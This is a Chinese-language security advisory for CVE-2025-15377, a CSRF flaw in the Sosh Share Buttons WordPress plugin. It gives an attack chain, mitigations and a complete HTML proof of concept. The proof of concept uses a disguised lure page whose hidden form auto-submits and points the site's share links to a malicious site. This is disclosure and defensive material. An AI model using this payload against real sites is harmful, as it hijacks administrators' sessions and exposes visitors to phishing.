CVE-2025-15377 WordPress Sosh Share Buttons插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-15377

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Sosh Share Buttons WordPress插件

漏洞概述

CVE-2025-15377是WordPress平台下Sosh Share Buttons社交分享按钮插件的一个中危安全漏洞。该漏洞存在于插件的1.1.0及以下所有版本中，由于admin_page_content函数缺少适当的CSRF令牌验证机制，攻击者可以利用此漏洞通过诱导已登录的管理员点击恶意链接，在管理员不知情的情况下修改插件设置。Sosh Share Buttons是一款广受欢迎的WordPress社交分享插件，为网站提供Facebook、Twitter等主流社交平台的分享按钮功能。由于该插件在WordPress生态系统中拥有一定的用户基数，此次CSRF漏洞可能影响大量使用该插件的网站。攻击者无需具备特殊权限，只需诱导目标网站管理员执行特定操作即可利用此漏洞。虽然该漏洞不直接导致数据泄露或服务器被完全控制，但攻击者可以通过修改插件设置来影响网站的分享功能，进而可能用于传播恶意内容或进行钓鱼攻击。漏洞的CVSS评分为4.3，属于中等严重程度，主要风险在于需要用户交互（诱导点击链接）才能成功利用。

技术细节

该CSRF漏洞的根本原因在于Sosh Share Buttons插件的admin_page_content函数未实现WordPress推荐的安全防护措施——nonce令牌验证机制。在WordPress插件开发中，nonce机制是防止CSRF攻击的标准做法，开发者需要在表单中生成唯一的nonce值，并在处理请求时验证该值。然而，该插件的开发者在实现admin_page_content函数时遗漏了这一关键的安全检查。攻击者可以构造一个包含修改插件设置请求的HTML页面，当已登录的管理员访问该页面或点击攻击者提供的链接时，浏览器会自动向目标网站发送携带管理员cookies的请求。由于插件未验证请求的合法性（缺少nonce检查），它会认为这是管理员的合法操作并执行相应的设置更新。攻击者可以利用此漏洞修改插件的配置参数，例如分享按钮的显示设置、链接指向的URL等。在某些场景下，攻击者甚至可能通过修改设置将分享链接指向恶意网站，从而对网站访问者造成进一步的安全威胁。漏洞代码位于插件的sosh.class.php文件第138行附近。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的Sosh Share Buttons插件版本，确认版本在1.1.0或以下版本

STEP 2

步骤2: 构造恶意页面

攻击者创建一个包含CSRF表单的HTML页面，表单中包含修改插件设置的请求参数

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导目标网站管理员访问恶意页面或点击特制链接

STEP 4

步骤4: 自动提交请求

当管理员浏览器加载恶意页面时，隐藏的CSRF表单会自动向目标网站发送POST请求

STEP 5

步骤5: 验证绕过

由于插件缺少nonce验证，请求被服务器接受并执行，插件设置被恶意修改

STEP 6

步骤6: 后续攻击

攻击者利用修改后的设置（如将分享链接指向恶意网站）进一步攻击网站访问者

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-15377 -->
<!-- This PoC demonstrates how an attacker can trick a WordPress admin into updating Sosh Share Buttons settings -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack Demo</title>
</head>
<body>
    <h1>Check out this cool article!</h1>
    <p>Click the link below to read more:</p>
    <a href="http://target-site.com/interesting-article">Read More</a>

    <!-- Hidden CSRF form that auto-submits -->
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin.php?page=sosh_share_buttons" method="POST" style="display:none;">
        <!-- Plugin settings that will be modified -->
        <input type="hidden" name="sosh_facebook_enabled" value="1">
        <input type="hidden" name="sosh_twitter_enabled" value="1">
        <input type="hidden" name="sosh_facebook_url" value="https://malicious-site.com">
        <input type="hidden" name="sosh_twitter_url" value="https://malicious-site.com">
        <input type="hidden" name="sosh_save_settings" value="1">
        <!-- Missing nonce field - this is the vulnerability -->
    </form>

    <script>
        // Auto-submit the form when page loads
        window.onload = function() {
            document.getElementById('csrfForm').submit();
            // Redirect after form submission
            setTimeout(function() {
                window.location.href = 'http://target-site.com/interesting-article';
            }, 1000);
        };
    </script>
</body>
</html>

影响范围

Sosh Share Buttons <= 1.1.0

防御指南

临时缓解措施

在官方补丁发布之前，网站管理员可以采取以下临时缓解措施：1) 暂时禁用或删除Sosh Share Buttons插件；2) 在管理员操作时保持警惕，避免点击来源不明的链接；3) 使用浏览器开发者工具检查可疑页面的网络请求；4) 启用Wordfence等安全插件的CSRF保护功能；5) 限制管理员账户的使用范围，使用独立的浏览器会话进行管理操作；6) 监控网站的插件设置变更记录，及时发现异常修改。